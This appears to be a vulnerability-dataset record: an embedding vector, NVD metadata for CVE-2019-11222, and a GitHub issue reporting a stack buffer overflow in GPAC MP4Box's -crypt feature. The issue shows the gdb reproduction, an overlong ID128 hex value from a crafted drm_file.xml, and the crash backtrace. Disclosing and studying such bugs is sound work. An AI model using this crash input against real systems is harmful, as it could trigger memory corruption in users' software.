0.006044281646609306, -0.00825705286115408, 0.013491964899003506, 0.005134669132530689, -0.019038744270801544, 0.002628594171255827, 0.008843660354614258, -0.01336573250591755, 0.023894960060715675, -0.010506951250135899, -0.007269473746418953, 0.009237206541001797, 0.010105978697538376, 0.0085763456299901, -0.0013672030763700604, 0.021221812814474106, -0.039651673287153244, 0.012266772799193859, 0.0003255576884839684, -0.02012285403907299, 0.0006353363860398531, -0.008739704266190529, 0.003506648587062955, -0.00009223748202202842, -0.003755399724468589, -0.01073713880032301, -0.02860266901552677, -0.022632641717791557, -0.006664303131401539, 0.011902927421033382, 0.02938976138830185, 0.0039354655891656876, -0.019038744270801544, 0.012333601713180542, -0.02910759672522545, 0.008405560627579689, -0.02240987867116928, 0.015771564096212387, -0.018370456993579865, 0.03175104036927223, 0.00531659135594964, -0.02928580529987812, -0.007358578499406576, 0.015429995954036713, 0.012920208275318146, 0.01603887975215912, 0.019914941862225533, 0.0033265824895352125, -0.03522613272070885, 0.008205074816942215, 0.0007977671921253204, 0.011732143349945545, 0.012890506535768509, 0.010677735321223736, -0.01177669595927, -0.0151181286200881, 0.0221425648778677, 0.009482244960963726, -0.013128119520843029, -0.018088292330503464, -0.015860669314861298, -0.0020809704437851906, -0.009459968656301498, -0.009422841481864452, -0.012125689536333084, 0.0023241525050252676, -0.017598215490579605, -0.006471242289990187, 0.004061697516590357, 0.024399887770414352, 0.02099905163049698, -0.014680029824376106, -0.0055282157845795155, -0.008442687802016735, 0.01792493276298046, 0.009170377627015114, 0.015786414965987206, -0.023909810930490494, 0.03466179966926575, -0.0030351351015269756, 0.011019304394721985, -0.014925068244338036, 0.018741726875305176, -0.018429860472679138, 0.014665178954601288, 0.008026865310966969, -0.0059774527326226234, -0.010774265974760056, 0.006311595905572176, 0.0024633787106722593, -0.006790535058826208, -0.011509381234645844, 0.0006177010363899171, 0.016068581491708755, 0.01473200786858797, 0.014368162490427494, 0.0010534796165302396, 0.0005355575121939182, -0.027251243591308594, 0.012816253118216991, 0.002118097385391593, 0.017345750704407692, -0.009407990612089634, 0.0011397999478504062, 0.004124813713133335, -0.014360737055540085, -0.01584581844508648, -0.012675169855356216, -0.012125689536333084, -0.020464422181248665, 0.04232482239603996, 0.021028753370046616, 0.005387132987380028, 0.002170075196772814, 0.011524232104420662, 0.04579991102218628, 0.010670309886336327, 0.009653029032051563, -0.006434115115553141, 0.001495291362516582, -0.0033618530724197626, 0.004109962843358517, -0.001399689237587154, -0.02288510464131832, -0.055096521973609924, 0.022677194327116013, 0.0137889813631773, 0.0016809265362098813, -0.023523690178990364, -0.008368433453142643, 0.010618331842124462, 0.014687455259263515, -0.010566354729235172, 0.0051606581546366215, -0.019632777199149132, -0.01159848552197218, 0.005884635262191296, 0.016929928213357925, 0.02316727116703987, 0.017627917230129242, 0.011316320858895779, 0.009497095830738544, -0.02641959860920906, -0.014353311620652676, 0.001613169675692916, -0.010603480972349644, -0.0004538780194707215, -0.008405560627579689, -0.01964762806892395, 0.0027084173634648323, -0.021904950961470604, 0.0045703379437327385, 0.006218778435140848, 0.022825701162219048, 0.0009212145814672112, 0.0030054335948079824, 0.003601322416216135, -0.01603887975215912, -0.02852841466665268, -0.014806262217462063, 0.0021199537441134453, 0.0005777894984930754, -0.019781284034252167, -0.019573373720049858, 0.022959358990192413, 0.003501079510897398, 0.008739704266190529, -0.00006282590766204521, -0.0011203082976862788, 0.008264478296041489, 0.020969349890947342, 0.01755366288125515, -0.015266637317836285, -0.01135344710201025, -0.012675169855356216, 0.004462669603526592, 0.0034843722824007273, -0.019781284034252167, 0.02154853194952011, 0.011992032639682293, 0.023048464208841324, -0.04110705479979515, -0.01620223931968212, 0.02814229391515255, 0.003712703473865986, 0.043245572596788406, -0.003061124123632908, 0.006385850254446268, -0.02670176327228546, -0.008323881775140762, -0.009244631975889206, -0.001500860438682139, -0.0060776956379413605, -0.004640879575163126, 0.000901722873095423, 0.004165653605014086, -0.0217415913939476, 0.003879775293171406, -0.014056296087801456, -0.017523961141705513, 0.007080125622451305, -0.024073170498013496, -0.007599904201924801, -0.020746586844325066, 0.027548260986804962, -0.009274333715438843, 0.00935601256787777, -0.021697038784623146, 0.016915077343583107, 0.008086268790066242, 0.01417510211467743, -0.0127419987693429, 0.015504250302910805, -0.014197378419339657, -0.022573238238692284, 0.00524605019018054, -0.0038352226838469505, -0.005795530043542385, 0.00042046367889270186, -0.010321316309273243, -0.00408026110380888, 0.009816388599574566, -0.00276596425101161, -0.0014999322593212128, -0.0036774328909814358, -0.014694880694150925, -0.0017264072084799409, 0.007377142086625099, -0.01899419166147709, -0.004299310967326164, 0.01736060157418251, -0.0007666732999496162, -0.040216006338596344, 0.007262048311531544, -0.002023423556238413, -0.002125522820279002, 0.0030592677649110556, 0.02356824278831482, -0.014390438795089722, 0.01706358604133129, 0.020271360874176025, 0.008531793020665646, 0.0009416344691999257, 0.012942484579980373, 0.0005337011534720659, 0.004380990285426378, -0.000018447495676809922, -0.019692178815603256, 0.0019491693237796426, 0.009601050987839699, 0.00019596113997977227, -0.000017330783521174453, -0.007031860761344433, 0.003161367028951645, 0.011279193684458733, 0.01946941763162613, -0.008182798512279987, -0.0008970819762907922, 0.00224247295409441, -0.009014444425702095, 0.008427836932241917, 0.00977926142513752, -0.004611177835613489, -0.00600715447217226, -0.003857498988509178, 0.0032170575577765703, -0.013937489129602909, -0.010544078424572945, 0.0005374138709157705, 0.006794247310608625, 0.01868232525885105, 0.003631024155765772, -0.01869717426598072, -0.006508369464427233, -0.009653029032051563, 0.013001888059079647, -0.003655156586319208, -0.029894689098000526, -0.00944511778652668, -0.009593626484274864, 0.023597944527864456, 0.016722016036510468, -0.0163061935454607, 0.016380447894334793, 0.0021199537441134453, 0.013224650174379349, 0.0002234583516838029, 0.010469824075698853, -0.0024875113740563393, -0.007848655804991722, 0.009801537729799747, -0.007332589477300644, 0.0015082858735695481, 0.018474413082003593, 0.01574186235666275, 0.003660725662484765, -0.02022680826485157, 0.018964489921927452, -0.006289320066571236, 0.007421694230288267, 0.003120527369901538, -0.019707029685378075, -0.01584581844508648, -0.01889023557305336, -0.011865800246596336, -0.007076412905007601, 0.006630888674408197, 0.00006381209095707163, -0.019499119371175766, -0.006315308623015881, 0.0108707956969738, 0.046126630157232285, -0.00419906759634614, -0.010848519392311573, -0.0012381866108626127, 0.0033804166596382856, 0.0022146275732666254, 0.003690427402034402, 0.01878627948462963, -0.015608205460011959, 0.005947750993072987, 0.012110838666558266, 0.000173568885657005, -0.01321722473949194, 0.030859991908073425, 0.0013931919820606709, 0.006738557014614344, 0.0011732142884284258, 0.006047993898391724, 0.0014451699098572135, 0.02729579620063305, 0.011435126885771751, 0.013105843216180801, 0.005899486131966114, -0.0030926819890737534, -0.015504250302910805, 0.002171931555494666, -0.013833533972501755, 0.0031409473158419132, 0.00744025781750679, -0.014360737055540085, -0.006616037804633379, 0.002853212645277381, 0.028023486956954002, 0.0054353978484869, -0.04104765132069588, 0.010061427019536495, 0.004395841155201197, 0.002088395645841956, -0.0008242201874963939, -0.00043508244561962783, -0.01973673142492771, 0.021593084558844566, 0.031216410920023918, 0.024266229942440987, -0.003671863814815879, 0.017717020586133003, 0.0009161095949821174, 0.0006260546506382525, -0.007028148043900728, -0.01335088163614273, -0.02587011829018593, -0.008041716180741787, 0.002290738048031926, -0.0086357481777668, -0.014375587925314903, 0.017019033432006836, -0.019900090992450714, -0.001394120161421597, -0.006170513108372688, 0.013276628218591213, 0.015905221924185753, -0.014835963025689125, 0.02803833782672882, 0.0075033740140497684, -0.01330632995814085, -0.006998446304351091, 0.000545767426956445, -0.011152961291372776, -0.01565275900065899, -0.009088698774576187, -0.0010674023069441319, -0.01159848552197218, -0.025587953627109528, -0.019588224589824677, -0.008784256875514984, 0.02662751078605652, 0.01687052473425865, -0.009474819526076317, 0.008502091281116009, -0.008026865310966969, 0.004132239148020744, -0.009214930236339569, 0.012199943885207176, -0.007421694230288267, -0.005955176427960396, 0.005780679639428854, 0.005569055210798979, 0.007473672274500132, 0.021325768902897835, -0.005104967392981052, -0.02080599032342434, 0.015415145084261894, -0.0018210811540484428, 0.010885646566748619, -0.013677599839866161, -0.007551638875156641, 0.0063635739497840405, -0.01335088163614273, -0.02385040745139122, -0.01871202513575554, -0.0009940763702616096, 0.00792290922254324, 0.0035029358696192503, 0.01612798497080803, 0.0028513562865555286, 0.010299040004611015, 0.024578098207712173, 0.018251650035381317, -0.015184957534074783, 0.01801403798162937, 0.013261777348816395, 0.013157821260392666, -0.020865393802523613, -0.014108273200690746, -0.0064638168551027775, -0.006816523615270853, -0.02557310275733471, -0.004065410234034061, 0.0020902520045638084, 0.018845682963728905, 0.017316048964858055, -0.025587953627109528, -0.005045564379543066, 0.0006738557131029665, -0.005821519065648317, 0.0027622515335679054, 0.013529092073440552, 0.003913189750164747, -0.004251045640558004, -0.023627646267414093, -0.018251650035381317, 0.0217415913939476, 0.02393951267004013, -0.01402659434825182, -0.010937624610960484, 0.05132441595196724, 0.021711889654397964, 0.011279193684458733, 0.00553192850202322, -0.002236903877928853, 0.030013496056199074, 0.015177532099187374, -0.025781013071537018, 0.01917240209877491, -0.011977181769907475, -0.0000026431259811943164, 0.0070504238829016685, 0.013855809345841408, 0.004800525493919849, -0.012860804796218872, -0.02622653730213642, 0.012044010683894157, -0.00765559496358037, -0.005814093630760908, -0.005149520002305508, -0.0214594267308712, -0.009868365712463856, 0.00141268374864012, 0.012838528491556644, 0.01899419166147709, 0.01832590438425541, 0.012682595290243626, -0.034958817064762115, 0.004440393298864365, -0.0036867146845906973, 0.004807950928807259, -0.00037335875094868243, 0.01330632995814085, -0.005773254204541445, 0.0042213439010083675, 0.0031706488225609064, 0.00209953379817307, -0.0029980081599205732, -0.011576210148632526, 0.01688537560403347, 0.005060414783656597, -0.0072991750203073025, 0.010454973205924034, 0.005543066654354334, 0.011516806669533253, -0.009734708815813065, 0.007752125151455402, 0.01690022647380829, -0.007432832382619381, -0.02587011829018593, 0.004024570807814598, -0.01545969769358635, 0.02517213113605976, 0.004692857153713703, -0.005910624284297228, -0.02863237075507641, 0.005739839747548103, -0.005613607820123434, 0.013090992346405983, 0.001156507176347077, 0.02116241119801998, -0.019677329808473587, -0.012994462624192238, -0.00834615807980299, -0.008123395033180714, 0.002028992399573326, -0.012385578826069832, 0.0008381428197026253, -0.009393139742314816, -0.009422841481864452, -0.0013495677849277854, 0.005825231783092022, -0.011368297971785069, 0.003738692495971918, 0.021503979340195656, 0.013848383910953999, -0.008546643890440464, -0.0004606072907336056, 0.014680029824376106, 0.008130820468068123, 0.008568920195102692, -0.019439715892076492, 0.03326582536101341, 0.012110838666558266, -0.016454702243208885, 0.019410014152526855, -0.020197106525301933, 0.009363438002765179, -0.00022833126422483474, 0.014835963025689125, 0.005045564379543066, -0.013024164363741875, 0.02442958950996399, 0.005283177364617586, -0.015697311609983444, -0.009601050987839699, 0.005884635262191296, 0.008294180035591125, 0.0038315101992338896, 0.03365194424986839, -0.01915755122900009, 0.017523961141705513, 0.003876062575727701, 0.00969015620648861, 0.004410692024976015, -0.0017876668134704232, 0.015890371054410934, 0.0010209934553131461, -0.013172672130167484, -0.010388144291937351, 0.003991156350821257, -0.002853212645277381, -0.0019491693237796426, 0.014100847765803337, 0.008977317251265049, 0.024058319628238678, -0.005929187405854464, 0.0005202426109462976, 0.005557917058467865, -0.008717427961528301, -0.016439851373434067, -0.019603075459599495, -0.015429995954036713, -0.006486093159765005, -0.008115969598293304, -0.0014841532101854682, -0.004425542429089546, -0.015519101172685623, -0.009890642017126083, 0.009563924744725227, 0.002532063750550151, -0.016098283231258392, 0.0022925944067537785, -0.003931752871721983, -0.01096732635051012, 0.027904679998755455, 0.007960036396980286, 0.029597673565149307, 0.011992032639682293, 0.010744564235210419, -0.005231199320405722, -0.0008929052273742855, -0.009519372135400772, -0.009972321800887585, 0.00864317361265421, -0.035909269005060196, -0.005970027297735214, 0.008405560627579689, 0.014806262217462063, -0.002912615891546011, 0.014056296087801456, -0.014137974940240383, -0.005052989348769188, -0.002938604913651943, 0.0015175675507634878, -0.011390574276447296, -0.014189952984452248, 0.016261640936136246, 0.014360737055540085, -0.009712432511150837, 0.01384095847606659, 0.02001889795064926, -0.014034019783139229, 0.013885511085391045, 0.025781013071537018, 0.00977926142513752, -0.00019085616804659367, -0.0008980101556517184, 0.009838664904236794, 0.008108544163405895, -0.0062818946316838264, 0.012860804796218872, 0.0006116679287515581, -0.006051706615835428, -0.021533681079745293, -0.00116300443187356, 0.009511946700513363, -0.00824962742626667, -0.008524367585778236, -0.038879431784152985, 0.008925339207053185, 0.00744025781750679, 0.014687455259263515, -0.0023965502623468637, -0.0008297892636619508, -0.016172537580132484, -0.0030982510652393103, 0.03175104036927223, 0.012318750843405724, 0.009073847904801369, -0.00579924276098609, -0.00030653009889647365, -0.019959494471549988, -0.028365055099129677, 0.009096124209463596, -0.014152825810015202, 0.0011713579297065735, 0.01728634722530842, 0.0031168146524578333, 0.016855673864483833, 0.008464964106678963, 0.009459968656301498, 0.02108815684914589, -0.027058184146881104, -0.009838664904236794, 0.021682189777493477, -0.015251786448061466, 0.001767246867530048, -0.0010553359752520919, -0.007046711165457964, -0.008479814976453781, 0.012081137858331203, -0.0060591320507228374, 0.025884969159960747, 0.02318212017416954, -0.021697038784623146, 0.010759415104985237, 0.01358849462121725, 0.028647221624851227, 0.006783109623938799, -0.01287565566599369, 0.02252868562936783, 0.011865800246596336, -0.0010293470695614815, -0.018266500905156136, -0.00791548378765583, 0.0026824283413589, 0.018266500905156136, -0.023612795397639275, 0.006471242289990187, -0.011420276015996933, -0.005212635733187199, -0.020954499021172523, 0.02690967544913292, 0.023211821913719177, 0.00864317361265421, -0.0009304963168688118, -0.01531118992716074, -0.010365867987275124, -0.016632912680506706, -0.029330357909202576, -0.006552921608090401, -0.0017254790291190147, 0.016276491805911064, 0.0013783412287011743, 0.006259618327021599, 0.02745915576815605, 0.014182527549564838, 0.006660590413957834, -0.006341297645121813, 0.041344668716192245, 0.026078030467033386, -0.003942891024053097, 0.022439580410718918, -0.005858646240085363, -0.016573509201407433, -0.0017477552173659205, 0.02165248803794384, -0.00008748057734919712, 0.000913325056899339, 0.005071552935987711, -0.004759686067700386, 0.00696503184735775, 0.009185228496789932, 0.0024169699754565954, 0.0008451041649095714, -0.00009467393829254434, 0.007399418391287327, 0.015682460740208626, -0.004707708023488522, 0.0030072899535298347, -0.00396145461127162, 0.013514241203665733, 0.016722016036510468, -0.0018062302842736244, -0.020167406648397446, -0.012311325408518314, 0.020093152299523354, 0.00030931460787542164, -0.025974074378609657, 0.010610906407237053, -0.0010302752489224076, -0.006957606412470341, -0.00944511778652668, 0.01378155592828989, -0.021890100091695786, -0.017434855923056602, -0.014323610812425613, 0.0006952037219889462, 0.0037591124419122934, -0.0011695015709847212, -0.016276491805911064, 0.001969589153304696, 0.0018507827771827579, -0.01744970679283142, -0.003411974525079131, 0.008680300787091255, -0.005353718530386686, 0.008917913772165775, -0.030592678114771843, -0.028186844661831856, -0.010291614569723606, 0.0151181286200881, -0.014368162490427494, 0.0026453013997524977, -0.00882880948483944, 0.015340890735387802, -0.010068852454423904, -0.005546778906136751, 0.0016827828949317336, 0.01025448739528656, -0.020761437714099884, 0.011004453524947166, -0.04722559079527855, 0.003287598956376314, 0.002985013648867607, 0.001114739221520722, 0.008323881775140762, 0.0067496951669454575, -0.00920750480145216, -0.007447683252394199, -0.021340619772672653, 0.000027816271540359594, -0.00905899703502655, -0.0010609050514176488, -0.030221406370401382, 0.004236194770783186, -0.011346021667122841, 0.024102872237563133, -0.007714997977018356, 0.00306298048235476, 0.018726876005530357, 0.011004453524947166, 0.0008650599047541618, 0.0025729036424309015, -0.002931179478764534, 0.0119177782908082, 0.02061293087899685, 0.017598215490579605, 0.005283177364617586, 0.013892936520278454, -0.009786686860024929, -0.02031591348350048, -0.025706758722662926, -0.015563653782010078, 0.008613471873104572, -0.014672604389488697, -0.0010534796165302396, -0.008219925686717033, 0.0048933434300124645, -0.0041211009956896305, 0.01000944897532463, 0.04761170968413353, 0.010120829567313194, -0.005368569400161505, 0.013796406798064709, -0.01026191283017397, 0.01611313410103321, -0.005175508558750153, -0.008680300787091255, -0.0032913116738200188, -0.0275779627263546, 0.02166733890771866, -0.003566051833331585, 0.019825836643576622, -0.021697038784623146, -0.0211772620677948, 0.0051420945674180984, 0.001947313081473112, -0.03234507516026497, 0.013425135985016823, 0.01217024214565754, -0.0014108273899182677, 0.004076548386365175, -0.0006650380091741681, 0.027132438495755196, -0.010722287930548191, -0.0061779385432600975, 0.007573915179818869, 0.014798836782574654, -0.012192518450319767, 0.008888212032616138, 0.017122989520430565, -0.00677568418905139, -0.022974209859967232, -0.023969214409589767, 0.013640472665429115, 0.00010737834963947535, -0.02050897479057312, 0.006875927094370127, -0.029330357909202576, -0.020375316962599754, -0.02128121629357338, -0.005613607820123434, -0.003712703473865986, 0.008026865310966969, -0.011628187261521816, -0.008710002526640892, -0.0074179815128445625, -0.028157144784927368, 0.007429119665175676, 0.02509787678718567, -0.03406776860356331, -0.006099971942603588, -0.005539353936910629, -0.006081408355385065, -0.009957470931112766, 0.04838395118713379, 0.0010516232578083873, -0.0005114249070174992, 0.0035623391158878803, 0.00555420434102416, -0.0014182527083903551, -0.01417510211467743, 0.004124813713133335, -0.011940054595470428, -0.008992168121039867, -0.011561359278857708, -0.007009584456682205, -0.012935059145092964, -0.007269473746418953, -0.01240785513073206, -0.007633318658918142, 0.012147965840995312, -0.011509381234645844, 0.0004083974054083228, -0.015608205460011959, 0.02509787678718567, -0.0019083296647295356, 0.014538947492837906, -0.022261369973421097, 0.0013365732738748193, 0.009890642017126083, -0.0015639764023944736, -0.02843930944800377, -0.00679796002805233, -0.004057984799146652, 0.008271903730928898, 0.00009391979983774945, -0.006211353000253439, 0.005338867660611868, 0.01335088163614273, -0.006422976963222027, -0.009519372135400772, 0.016736866906285286, -0.01193262916058302, -0.007429119665175676, -0.021607935428619385, -0.006426689680665731, 0.00608512107282877, 0.002047555986791849, -0.034691501408815384, 0.013343456201255322, -0.022305922582745552, 0.02835020422935486, 0.02240987867116928, 0.012147965840995312, 0.007848655804991722, 0.01774672232568264, 0.00008324577356688678, 0.015140404924750328, -0.004536923952400684, 0.0025209258310496807, 0.014308759942650795, -0.004280747380107641, -0.03192925080657005, -0.004362426698207855, 0.00935601256787777, -0.005001011770218611, -0.021875249221920967, -0.010002023540437222, -0.020969349890947342, 0.0018136557191610336, 0.023538541048765182, 0.00862832274287939, 0.01450182031840086, 0.011130684986710548, -0.019127849489450455, -0.008502091281116009, -0.011613336391746998, -0.004945321008563042, -0.00839070975780487, -0.02135547064244747, -0.0025543400552123785, -0.021994056180119514, 0.01335088163614273, 0.008093694224953651, -0.019231803715229034, -0.00030096102273091674, 0.003972592763602734, -0.00005160077853361145, 0.014182527549564838, 0.0035400628112256527, -0.008524367585778236, -0.005446536000818014, 0.005866071674972773, -0.00024178982130251825, 0.020479273051023483, 0.002407688181847334, -0.01776157319545746, -0.004421830177307129, 0.021697038784623146, -0.008212500251829624, 0.004161940887570381, 0.00934858713299036, 0.0019213240593671799, 0.018771428614854813, -0.0021143846679478884, -0.016142835840582848, -0.028082890436053276, -0.003924327902495861, 0.012667744420468807, -0.01064060814678669, 0.00977926142513752, -0.01603887975215912, -0.01574186235666275, 0.010811393149197102, 0.00460375240072608, -0.012548938393592834, -0.025543401017785072, -0.01321722473949194, 0.018177397549152374, 0.011294044554233551, 0.024399887770414352, -0.005684148985892534, 0.02367219887673855, 0.016662614420056343, -0.0016363740433007479, -0.001691136509180069, 0.02803833782672882, -0.019038744270801544, 0.003298737108707428, 0.008813958615064621, 0.006794247310608625, 0.018281351774930954, 0.036770615726709366, -0.007094976492226124, -0.005264613777399063, -0.0004615354700945318, 0.01426420733332634, 0.022201966494321823, 0.01985553838312626, 0.003647731151431799, -0.014056296087801456, 0.02040501870214939, 0.00992034375667572, 0.0015695454785600305, -0.0017078436212614179, 0.04615633189678192, 0.0039057640824466944, -0.0037943830247968435, -0.020271360874176025, 0.00600715447217226, -0.022112863138318062, -0.004024570807814598, -0.00689449068158865, -0.0012651036959141493, -0.00110360118560493, 0.012920208275318146, -0.0009987172670662403, -0.009088698774576187, 0.005116105545312166, 0.015132979489862919, 0.013343456201255322, 0.023627646267414093, -0.02643444947898388, 0.006642026826739311, -0.005368569400161505, 0.026181984692811966, 0.0009147173259407282, -0.040513020008802414, -0.003749830648303032, 0.006809098180383444, 0.013261777348816395, -0.005706425290554762, 0.012133114971220493, -0.0021088155917823315, -0.02414742484688759, -0.011635612696409225, -0.0024355335626751184, -0.00969015620648861, 0.015519101172685623, -0.007306600455194712, 0.01441271509975195, -0.000723977223969996, 0.024385036900639534, 0.018949639052152634, 0.006226203870028257, 0.004499796777963638, -0.02812744304537773, -0.000990363652817905, 0.008234776556491852, 0.0022517547477036715, -0.0006218778435140848, -0.015816116705536842, 0.010662884451448917, -0.006393275689333677, 0.006716280709952116, -0.014078572392463684, 0.006508369464427233, -0.011175237596035004, -0.000028802458473364823, 0.02337518148124218, -0.011843523941934109, -0.007473672274500132, 0.007391992956399918, -0.001964020077139139, 0.008056567050516605, -0.008190223947167397, -0.027132438495755196, 0.004908194299787283 ]
257
CVE-2019-11222
2019-04-15T12:31:36.507000
gf_bin128_parse in utils/os_divers.c in GPAC 0.7.1 has a buffer overflow issue for the crypt feature when encountering a crafted_drm_file.xml file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/f3698bb1bce62402805c3fda96551a23101a32f9" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1204" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1205" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00025.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1205
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
there is a buffer overflow issue for crypt feature when use a crafted_drm_file.xml file. overflow occur when use a crafted ID128 value. root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# gdb ./MP4Box (gdb) set args -crypt drm_file.xml overview.mp4 -out overview_encrypted.mp4 (gdb) r Starting program: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box -crypt drm_file.xml overview.mp4 -out overview_encrypted.mp4 [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". [CORE] 128bit blob is not 16-bytes long: 6770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C31 [XML/NHML] Cannot parse ID128 *** stack smashing detected ***: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box terminated Program received signal SIGABRT, Aborted. 0x00007ffff725bc37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff725bc37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 #1 0x00007ffff725f028 in __GI_abort () at abort.c:89 #2 0x00007ffff72982a4 in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff73a4113 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff732fbbc in __GI___fortify_fail (msg=<optimized out>, msg@entry=0x7ffff73a40fb "stack smashing detected") at fortify_fail.c:38 #4 0x00007ffff732fb60 in __stack_chk_fail () at stack_chk_fail.c:28 #5 0x00007ffff7664910 in gf_xml_parse_bit_sequence_bs (bsroot=0x6950d0, bs=0x695200) at utils/xml_parser.c:2173 #6 0x00007ffff766495f in gf_xml_parse_bit_sequence (bsroot=0x6950d0, data=0x7ffffffbdcb8, data_size=0x7ffffffbdc84) at utils/xml_parser.c:2181 #7 0x00007ffff7954e85 in gf_cenc_parse_drm_system_info (mp4=0x670c20, drm_file=0x7fffffffe7db "drm_file.xml") at media_tools/ismacryp.c:2817 #8 0x00007ffff79553ec in gf_crypt_file (mp4=0x670c20, drm_file=0x7fffffffe7db "drm_file.xml") at media_tools/ismacryp.c:2898 #9 0x000000000042188c in mp4boxMain (argc=6, argv=0x7fffffffe548) at main.c:5202 #10 0x0000000000423d05 in main (argc=6, argv=0x7fffffffe548) at main.c:5712 Guoxiang Niu, EaglEye Team
buffer overflow issue 8#
https://api.github.com/repos/gpac/gpac/issues/1205/comments
1
2019-02-13T09:49:56
2019-04-19T08:50:26Z
https://github.com/gpac/gpac/issues/1205
409,715,577
1,205
true
